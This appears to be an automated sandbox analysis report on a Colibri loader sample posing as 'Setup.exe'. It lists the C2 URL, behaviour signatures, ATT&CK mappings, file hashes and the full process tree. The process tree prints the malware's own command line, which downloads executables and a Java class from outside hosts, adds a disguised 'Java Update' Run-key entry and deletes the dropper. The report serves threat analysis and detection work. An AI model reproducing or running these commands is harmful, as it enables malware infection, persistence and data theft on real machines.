Analysis

  • max time kernel
    137s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2022 21:48

General

  • Target

    AppSetup/Setup.exe

  • Size

    700.0MB

  • MD5

    7c5d1c8213b4f6d0024271fef44e6cd0

  • SHA1

    207849a369dae9a6084850791e0ec53209cc928e

  • SHA256

    bde1ea677730594b57aec1799bb7a51bc1b821ea0f6fa1281127f94cc12445a5

  • SHA512

    d90f3b0054376d642e0d57f68a9cd54f8a29b893dfa4428a3a8280c0c93fc0c441b412a5367865d306a08a36720a9ed186bc290899f7c55341768188b7fa635d

  • SSDEEP

    12288:OGnwnjo3r9nWZQzjFeM6DJOjB9sTTHy832srZZUcCO5x9tWFHeQR8KeHj3Fuxkxv:OC9nYQb6VOcdFz9twRgb6kxChx47B

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

test

C2

http://65.109.7.23/gate.php

Signatures

  • Colibri Loader

    A loader sold as MaaS first seen in August 2021.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA1AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
      C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Users\Admin\AppData\Local\Temp\Build.exe
        "C:\Users\Admin\AppData\Local\Temp\Build.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA1AA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4848
        • C:\Users\Admin\AppData\Local\Temp\Build.exe
          C:\Users\Admin\AppData\Local\Temp\Build.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Checks processor information in registry
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4936
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "(mkdir "%APPDATA%\Java\jre1.8.0_141\bin\client") & (mkdir "%APPDATA%\Java\jre1.8.0_141\lib\i386") & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\javaw.exe" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\javaw.exe" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/javaw.exe) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\java.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\java.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/java.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\verify.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\verify.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/verify.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\zip.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\zip.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/zip.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\net.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\net.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/net.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\nio.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\nio.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/nio.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\msvcp120.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\msvcp120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcp120.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\msvcr120.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\msvcr120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcr120.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\client\jvm.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\client\jvm.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\lib\rt.jar" curl -L -o "%APPDATA%\Java\jre1.8.0_141\lib\rt.jar" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/rt.jar) & (if not exist "%APPDATA%\Java\jre1.8.0_141\lib\i386\jvm.cfg" curl -L -o "%APPDATA%\Java\jre1.8.0_141\lib\i386\jvm.cfg" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.cfg) & (cd /d "%APPDATA%\Java\jre1.8.0_141") & (curl -L -o "%APPDATA%\Java\jre1.8.0_141\Runtime.class" -k http://193.106.191.11/RuntimeMain.class) & (reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "Java Update 8u141" /t REG_SZ /d "cmd /c \"cd \"%APPDATA%\Java\jre1.8.0_141\" ^&^& start /b bin\javaw.exe -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime ^&^& exit\"") & (bin\javaw -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime)"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1164
            • C:\Windows\SysWOW64\curl.exe
              curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/javaw.exe
              6⤵
                PID:1644
              • C:\Windows\SysWOW64\curl.exe
                curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\java.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/java.dll
                6⤵
                  PID:1888
                • C:\Windows\SysWOW64\curl.exe
                  curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\verify.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/verify.dll
                  6⤵
                    PID:4664
                  • C:\Windows\SysWOW64\curl.exe
                    curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\zip.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/zip.dll
                    6⤵
                      PID:2392
                    • C:\Windows\SysWOW64\curl.exe
                      curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\net.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/net.dll
                      6⤵
                        PID:1904
                      • C:\Windows\SysWOW64\curl.exe
                        curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\nio.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/nio.dll
                        6⤵
                          PID:1296
                        • C:\Windows\SysWOW64\curl.exe
                          curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcp120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcp120.dll
                          6⤵
                            PID:2540
                          • C:\Windows\SysWOW64\curl.exe
                            curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcr120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcr120.dll
                            6⤵
                              PID:4032
                            • C:\Windows\SysWOW64\curl.exe
                              curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\client\jvm.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.dll
                              6⤵
                                PID:4556
                              • C:\Windows\SysWOW64\curl.exe
                                curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\rt.jar" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/rt.jar
                                6⤵
                                  PID:4452
                                • C:\Windows\SysWOW64\curl.exe
                                  curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\i386\jvm.cfg" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.cfg
                                  6⤵
                                    PID:3916
                                  • C:\Windows\SysWOW64\curl.exe
                                    curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\Runtime.class" -k http://193.106.191.11/RuntimeMain.class
                                    6⤵
                                      PID:1360
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "Java Update 8u141" /t REG_SZ /d "cmd /c \"cd \"C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\" && start /b bin\javaw.exe -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime && exit\""
                                      6⤵
                                      • Adds Run key to start application
                                      • Modifies registry key
                                      PID:1204
                                    • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe
                                      bin\javaw -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4696
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C timeout 5 & del "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2532
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout 5
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:2820
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 1336
                                3⤵
                                • Program crash
                                PID:2004
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2864 -ip 2864
                            1⤵
                              PID:996

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Registry Run Keys / Startup Folder

                            1
                            T1060

                            Defense Evasion

                            Modify Registry

                            2
                            T1112

                            Credential Access

                            Credentials in Files

                            1
                            T1081

                            Discovery

                            Query Registry

                            3
                            T1012

                            System Information Discovery

                            3
                            T1082

                            Collection

                            Data from Local System

                            1
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                              Filesize

                              1KB

                              MD5

                              4280e36a29fa31c01e4d8b2ba726a0d8

                              SHA1

                              c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                              SHA256

                              e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                              SHA512

                              494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                              Filesize

                              53KB

                              MD5

                              06ad34f9739c5159b4d92d702545bd49

                              SHA1

                              9152a0d4f153f3f40f7e606be75f81b582ee0c17

                              SHA256

                              474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                              SHA512

                              c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              16KB

                              MD5

                              017620670b4e2b18d979a618f8cff16a

                              SHA1

                              954c4df7b95ec997036c92e8d0fd4d755262e839

                              SHA256

                              262ce1e2c40e8ad42487cbf0d24d8926c8289915ff2a9340f12df5d5f7b2b333

                              SHA512

                              e3144790f7e477ff65e56590eaa2ce519bcba9f7f8ceb2eec7dee0dfba1af07a7d8cfcfa745006dc0c71c5c7e0711663ea116504de1c7a1373ad9ac3d5ec96f1

                            • C:\Users\Admin\AppData\Local\Temp\Build.exe
                              Filesize

                              1.9MB

                              MD5

                              4ca8c9a0b9c71c36ad4a3bacf084eede

                              SHA1

                              901d7cc50c73c585f979bab9efe426a12d40ecfe

                              SHA256

                              9b7b830adffaf009ec511b32a7c12871765a6a274f4fa0df758ca5ad8e64ad92

                              SHA512

                              35a2e6ff75ac7858e20451881cac84de0a5265e0c66a875c18c749ad9d3a857455edd72645f405157e2a87a1273b024be13b423a4d36b95674cb509071b43d9c

                            • C:\Users\Admin\AppData\Local\Temp\Build.exe
                              Filesize

                              1.9MB

                              MD5

                              4ca8c9a0b9c71c36ad4a3bacf084eede

                              SHA1

                              901d7cc50c73c585f979bab9efe426a12d40ecfe

                              SHA256

                              9b7b830adffaf009ec511b32a7c12871765a6a274f4fa0df758ca5ad8e64ad92

                              SHA512

                              35a2e6ff75ac7858e20451881cac84de0a5265e0c66a875c18c749ad9d3a857455edd72645f405157e2a87a1273b024be13b423a4d36b95674cb509071b43d9c

                            • C:\Users\Admin\AppData\Local\Temp\Build.exe
                              Filesize

                              1.9MB

                              MD5

                              4ca8c9a0b9c71c36ad4a3bacf084eede

                              SHA1

                              901d7cc50c73c585f979bab9efe426a12d40ecfe

                              SHA256

                              9b7b830adffaf009ec511b32a7c12871765a6a274f4fa0df758ca5ad8e64ad92

                              SHA512

                              35a2e6ff75ac7858e20451881cac84de0a5265e0c66a875c18c749ad9d3a857455edd72645f405157e2a87a1273b024be13b423a4d36b95674cb509071b43d9c

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\Runtime.class
                              Filesize

                              27KB

                              MD5

                              10ef0192cb8a9a12d7d8880977712dcf

                              SHA1

                              f9b60ada7527c56d5c72862c73acea4ebe3a9d67

                              SHA256

                              f952e13c478b72d2bbef97a9156f62d4ec075f1c1f00d5bef2574084cd25e7f2

                              SHA512

                              c8686b113e1ca4b507ada22a07bf0966a639998e2c327afc9f1a7682256bebab3f338dd9e8aa66ee39fcfd319d2ee21bf0142adf30035cbcec50a5974c7c7161

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\client\jvm.dll
                              Filesize

                              3.7MB

                              MD5

                              b21095557e873cf2d8591a264197141c

                              SHA1

                              481ab680ef38b02c0d9dc87c9e1b9688763bc3bc

                              SHA256

                              4dfcd7546ddcd32b3baf5297e280bca77be81016e87a675c9cd56f88d6e010d7

                              SHA512

                              fc30c5f6edaf663017ba7587839ac28902774b6a60f512e8b984a2e3e8cb4d68fdd088f41f98b6981a785a452545ce68e26d6f842d0df58ee682d0027ecf046f

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\client\jvm.dll
                              Filesize

                              3.7MB

                              MD5

                              b21095557e873cf2d8591a264197141c

                              SHA1

                              481ab680ef38b02c0d9dc87c9e1b9688763bc3bc

                              SHA256

                              4dfcd7546ddcd32b3baf5297e280bca77be81016e87a675c9cd56f88d6e010d7

                              SHA512

                              fc30c5f6edaf663017ba7587839ac28902774b6a60f512e8b984a2e3e8cb4d68fdd088f41f98b6981a785a452545ce68e26d6f842d0df58ee682d0027ecf046f

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\java.dll
                              Filesize

                              136KB

                              MD5

                              36e1b4981ad764dd214a124c007caf73

                              SHA1

                              37cfb21e13099bfa7b20e1d892e1d798454a4cc9

                              SHA256

                              c7a3896d4fa6373021a9561dd94d3c1d2a365c769c0b2bd91bb413bc0ec11026

                              SHA512

                              f23ca754ad380b0a5aeabfb368ea39dc1c101222a41cf2a7a66d022ddd196963f11d1bb1345ceee318c20da1af64f768915cac1b6b1774fa7e17a741e2aad0c3

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\java.dll
                              Filesize

                              136KB

                              MD5

                              36e1b4981ad764dd214a124c007caf73

                              SHA1

                              37cfb21e13099bfa7b20e1d892e1d798454a4cc9

                              SHA256

                              c7a3896d4fa6373021a9561dd94d3c1d2a365c769c0b2bd91bb413bc0ec11026

                              SHA512

                              f23ca754ad380b0a5aeabfb368ea39dc1c101222a41cf2a7a66d022ddd196963f11d1bb1345ceee318c20da1af64f768915cac1b6b1774fa7e17a741e2aad0c3

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe
                              Filesize

                              203KB

                              MD5

                              22c17a0c25b983cff99678f6c1bf3b93

                              SHA1

                              80043ffc26541f1a84f9433c105a12b5e7bf8687

                              SHA256

                              4ad907bcead1dc38ff4c7d964abbf4630ca2de81e195cf3f93d1861aca9c8779

                              SHA512

                              faa3f114548eca84b1ac960d86044c41edb76352a63dab12318453dfcc45f840f05364262f0598d9884dce10badb683567391374fec5c2a1d5b5e78ded8aea18

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcp120.dll
                              Filesize

                              439KB

                              MD5

                              c6a06c5d0378301834639ddbe4384b52

                              SHA1

                              a5958f566d5d951a14468923496d37891dc9f7c2

                              SHA256

                              54d0bab82c3e8da896f806a80041d52546aaaa4d6068cc9579631ab00d0385b6

                              SHA512

                              f501d6a261bcda97c21fc733a3e751ea7af027f9356c4c6ad060db3f8195c295cf9b2cc13855bbdb316ce1e275fbec276b639918d40d865f54bf3c09830dff83

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcp120.dll
                              Filesize

                              439KB

                              MD5

                              c6a06c5d0378301834639ddbe4384b52

                              SHA1

                              a5958f566d5d951a14468923496d37891dc9f7c2

                              SHA256

                              54d0bab82c3e8da896f806a80041d52546aaaa4d6068cc9579631ab00d0385b6

                              SHA512

                              f501d6a261bcda97c21fc733a3e751ea7af027f9356c4c6ad060db3f8195c295cf9b2cc13855bbdb316ce1e275fbec276b639918d40d865f54bf3c09830dff83

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcr120.dll
                              Filesize

                              942KB

                              MD5

                              924cb26120b3bac52f7dc8815683588f

                              SHA1

                              649176369546f6af22d61ecab6dfea73e703ea6d

                              SHA256

                              035bd360935f369aba486b3ae12d9ef2f86bd1ca5e8ebb07c2ff43a64046ea2c

                              SHA512

                              66060188b51f3163ec689ca29120cdf31a74436ad0192e5822be62eefba8e5bd75e504f15ca97e09c21370f9bc1c19871d7cee2e39a072333a4b6dd5340c9d08

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcr120.dll
                              Filesize

                              942KB

                              MD5

                              924cb26120b3bac52f7dc8815683588f

                              SHA1

                              649176369546f6af22d61ecab6dfea73e703ea6d

                              SHA256

                              035bd360935f369aba486b3ae12d9ef2f86bd1ca5e8ebb07c2ff43a64046ea2c

                              SHA512

                              66060188b51f3163ec689ca29120cdf31a74436ad0192e5822be62eefba8e5bd75e504f15ca97e09c21370f9bc1c19871d7cee2e39a072333a4b6dd5340c9d08

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\net.dll
                              Filesize

                              85KB

                              MD5

                              7fe7d7ed9948d595efdba1c6bdc4d8a4

                              SHA1

                              327063ba8da63781834867180ff20b988d97ec10

                              SHA256

                              723e658ba1862dfca1033319d9b7318c74a1b8e88e33b35d44b196b12c73dabd

                              SHA512

                              92a42c337e1780be15fa507e92a4664f1da6a6ee59f06119653569354749099658222184ba459c1c7f6666482bd864a716cd77eff5ddde0710c778f7610f97d5

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\net.dll
                              Filesize

                              85KB

                              MD5

                              7fe7d7ed9948d595efdba1c6bdc4d8a4

                              SHA1

                              327063ba8da63781834867180ff20b988d97ec10

                              SHA256

                              723e658ba1862dfca1033319d9b7318c74a1b8e88e33b35d44b196b12c73dabd

                              SHA512

                              92a42c337e1780be15fa507e92a4664f1da6a6ee59f06119653569354749099658222184ba459c1c7f6666482bd864a716cd77eff5ddde0710c778f7610f97d5

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\nio.dll
                              Filesize

                              54KB

                              MD5

                              89d7fa3b5328dacc1ba486fc205d1eab

                              SHA1

                              b1ae460298956590ff6da27aa66eab416e4bd022

                              SHA256

                              4ab6e6a941454f401c760c34433c695ae1ba4a669e1f800b0112f6832111cd66

                              SHA512

                              0c374634f262250cb13532336097b8a87afa7e6b6094b601b95f1bdd8f5019fbdd250f86f5445c9671ed1734b39292a294f7f651dfec66dd4d447e7d2d546a60

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\nio.dll
                              Filesize

                              54KB

                              MD5

                              89d7fa3b5328dacc1ba486fc205d1eab

                              SHA1

                              b1ae460298956590ff6da27aa66eab416e4bd022

                              SHA256

                              4ab6e6a941454f401c760c34433c695ae1ba4a669e1f800b0112f6832111cd66

                              SHA512

                              0c374634f262250cb13532336097b8a87afa7e6b6094b601b95f1bdd8f5019fbdd250f86f5445c9671ed1734b39292a294f7f651dfec66dd4d447e7d2d546a60

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\verify.dll
                              Filesize

                              44KB

                              MD5

                              81b032d527e70a0a68ddae876e1ee3e1

                              SHA1

                              a5c975b5f5066698caebd7b9a373b481fc9ee882

                              SHA256

                              94458eb03feb96651c8bbe9b64b0d15c0ef9007d463cf576e66bb9ff22831896

                              SHA512

                              bcb762a11047459a07fd65df4f27d0df8e047ddd6d1f28f877443069c4f6d1c7649794125917f3de7fa43c10a8f065cd843d00e3d7c7a7c368eaca1536178b14

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\verify.dll
                              Filesize

                              44KB

                              MD5

                              81b032d527e70a0a68ddae876e1ee3e1

                              SHA1

                              a5c975b5f5066698caebd7b9a373b481fc9ee882

                              SHA256

                              94458eb03feb96651c8bbe9b64b0d15c0ef9007d463cf576e66bb9ff22831896

                              SHA512

                              bcb762a11047459a07fd65df4f27d0df8e047ddd6d1f28f877443069c4f6d1c7649794125917f3de7fa43c10a8f065cd843d00e3d7c7a7c368eaca1536178b14

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\zip.dll
                              Filesize

                              74KB

                              MD5

                              6128cc6cbcee211aeff1c7b92e132d5d

                              SHA1

                              2749621bd11f112b5f7f4c00c3c10e733a7e2902

                              SHA256

                              90fd233ac66f613c40b70cc6c2c7750cf5ed46489156c93e13b017a78fab6aba

                              SHA512

                              d706169efc0552e4aa107fae16d8168d7587b49d527ec4502859cc2776d9285a9dd3d5ac5d432f0456e039bb4e621b9af39926c74e1f7d881409ecdb4667edb9

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\zip.dll
                              Filesize

                              74KB

                              MD5

                              6128cc6cbcee211aeff1c7b92e132d5d

                              SHA1

                              2749621bd11f112b5f7f4c00c3c10e733a7e2902

                              SHA256

                              90fd233ac66f613c40b70cc6c2c7750cf5ed46489156c93e13b017a78fab6aba

                              SHA512

                              d706169efc0552e4aa107fae16d8168d7587b49d527ec4502859cc2776d9285a9dd3d5ac5d432f0456e039bb4e621b9af39926c74e1f7d881409ecdb4667edb9

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\i386\jvm.cfg
                              Filesize

                              28B

                              MD5

                              19079ca57b561559eca94490357ec716

                              SHA1

                              ac99a24a23811cd1ae33a1462882d71e69ae18d0

                              SHA256

                              c19c19f487657b3e2c4b70865d05b2762b8707f8538ac6cc01c258b9e09d193f

                              SHA512

                              a24ae4d97810574d43fda47a63acf044a7c24ed288b5171e6ac2d13c4088cf42c4ccc6d14be98ba4eddf898e8841d72ab10cd507f336de707498b2394b4efc32

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\rt.jar
                              Filesize

                              5.6MB

                              MD5

                              d53cc83ca7008801208a8e2b4bc85df7

                              SHA1

                              10063edd90563ba8b757be4abb28d24f0f4f8422

                              SHA256

                              7571c3cbdfea13b0ca22dcce9559d3fdc163f7f210f29332beacef9e17502bff

                              SHA512

                              a3186c1dc5a3e73615923a6a3d86acf4f20b051d886b2d4bfbe51f4fcfd461c0d7b6d1dcdff9f1f483d80e8fede5418b11ea36cc4589987db78c197a15fe9f8b

                            • memory/1164-164-0x0000000000000000-mapping.dmp
                            • memory/1204-180-0x0000000000000000-mapping.dmp
                            • memory/1296-173-0x0000000000000000-mapping.dmp
                            • memory/1360-179-0x0000000000000000-mapping.dmp
                            • memory/1456-132-0x0000000000CF0000-0x0000000000EBC000-memory.dmp
                              Filesize

                              1.8MB

                            • memory/1456-137-0x00000000068F0000-0x0000000006912000-memory.dmp
                              Filesize

                              136KB

                            • memory/1456-133-0x0000000005D40000-0x00000000062E4000-memory.dmp
                              Filesize

                              5.6MB

                            • memory/1456-134-0x00000000059D0000-0x0000000005A62000-memory.dmp
                              Filesize

                              584KB

                            • memory/1456-135-0x00000000059B0000-0x00000000059BA000-memory.dmp
                              Filesize

                              40KB

                            • memory/1456-136-0x00000000065D0000-0x000000000666C000-memory.dmp
                              Filesize

                              624KB

                            • memory/1644-166-0x0000000000000000-mapping.dmp
                            • memory/1888-169-0x0000000000000000-mapping.dmp
                            • memory/1904-172-0x0000000000000000-mapping.dmp
                            • memory/2392-171-0x0000000000000000-mapping.dmp
                            • memory/2532-165-0x0000000000000000-mapping.dmp
                            • memory/2540-174-0x0000000000000000-mapping.dmp
                            • memory/2744-139-0x0000000000AF0000-0x0000000000B26000-memory.dmp
                              Filesize

                              216KB

                            • memory/2744-145-0x0000000005F30000-0x0000000005F4A000-memory.dmp
                              Filesize

                              104KB

                            • memory/2744-143-0x0000000005A10000-0x0000000005A2E000-memory.dmp
                              Filesize

                              120KB

                            • memory/2744-142-0x0000000004DA0000-0x0000000004E06000-memory.dmp
                              Filesize

                              408KB

                            • memory/2744-141-0x0000000004A80000-0x0000000004AE6000-memory.dmp
                              Filesize

                              408KB

                            • memory/2744-140-0x0000000004E10000-0x0000000005438000-memory.dmp
                              Filesize

                              6.2MB

                            • memory/2744-144-0x0000000007090000-0x000000000770A000-memory.dmp
                              Filesize

                              6.5MB

                            • memory/2744-138-0x0000000000000000-mapping.dmp
                            • memory/2820-168-0x0000000000000000-mapping.dmp
                            • memory/2864-153-0x0000000000400000-0x0000000000407000-memory.dmp
                              Filesize

                              28KB

                            • memory/2864-146-0x0000000000000000-mapping.dmp
                            • memory/2864-147-0x0000000000400000-0x0000000000407000-memory.dmp
                              Filesize

                              28KB

                            • memory/2864-148-0x0000000000400000-0x0000000000407000-memory.dmp
                              Filesize

                              28KB

                            • memory/3916-178-0x0000000000000000-mapping.dmp
                            • memory/4032-175-0x0000000000000000-mapping.dmp
                            • memory/4224-152-0x00000000001F0000-0x00000000003E6000-memory.dmp
                              Filesize

                              2.0MB

                            • memory/4224-149-0x0000000000000000-mapping.dmp
                            • memory/4452-177-0x0000000000000000-mapping.dmp
                            • memory/4556-176-0x0000000000000000-mapping.dmp
                            • memory/4664-170-0x0000000000000000-mapping.dmp
                            • memory/4696-234-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-242-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-214-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-221-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-249-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

                            • memory/4696-248-0x00000000021E0000-0x00000000041E0000-memory.dmp
                              Filesize

                              32.0MB

